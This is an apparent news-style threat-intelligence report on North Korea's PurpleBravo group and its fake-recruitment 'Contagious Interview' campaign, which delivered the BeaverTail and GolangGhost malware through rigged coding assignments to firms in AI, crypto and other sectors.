The Recruitment Trap: North Korea’s “Contagious Interview” Infiltrates Global AI Firms

The North Korean threat collective PurpleBravo has, for over a year, orchestrated a sophisticated and targeted offensive designated as Contagious Interview. This campaign utilizes fraudulent recruitment processes to assault enterprises across Europe, Asia, the Middle East, and Central America. Researchers at Recorded Future have identified 3,136 IP addresses presumably associated with the operation’s objectives, alongside 20 confirmed corporate victims. The casualties encompass sectors as diverse as artificial intelligence, cryptocurrency, finance, IT services, marketing, and software engineering.

The incursions spanned from August 2024 to September 2025, with the highest concentration of targeted IP telemetry observed in South Asia and North America. Impacted organizations were situated in Belgium, Bulgaria, India, Italy, Costa Rica, the Netherlands, the United Arab Emirates, Pakistan, Romania, and Vietnam. Analysts underscore that in several instances, malicious code was executed directly on workstations, thereby escalating the peril from a singular user compromise to a systemic organizational threat.

A primary vector for infection involved the subversion of Visual Studio Code projects. Targets were presented with technical assignments containing deleterious files masquerading as legitimate development projects. This stratagem enabled the adversaries to install backdoors and secure a foothold within corporate infrastructures. Furthermore, the investigation unmasked fraudulent LinkedIn profiles operated by PurpleBravo members. These actors posed as developers and recruiters purportedly based in Odesa, utilizing several GitHub repositories to disseminate their malicious payloads.

The PurpleBravo command structure orchestrates at least two distinct command-and-control (C2) frameworks for disparate malware strains. One is a JavaScript-based infostealer dubbed BeaverTail; the other is GolangGhost, a Go-based backdoor derived from the open-source project HackBrowserData. These C2 servers are distributed across 17 different providers, managed via the Astrill VPN service, and utilize IP addresses originating from China.

Concurrently, a parallel initiative known as Wagemole has been identified. In this scheme, North Korean operatives secure employment within foreign firms by obfuscating their national origin. Despite their differing immediate objectives, the two operations share significant infrastructure and tactical overlaps. Forensic analysis has documented instances where a singular IP address associated with PurpleBravo was simultaneously utilized to manage Wagemole-related activities.

A fundamental vulnerability exploited by PurpleBravo is the inherent trust organizations place in external contractors and prospective candidates. By delivering “technical assessments” that candidates unwittingly execute on corporate-issued devices, the adversaries ensure that the resulting compromise transcends the individual, imperiling the entire organizational fabric. This poses an especially grave risk to companies with expansive client bases, creating significant vulnerabilities within the broader software supply chain.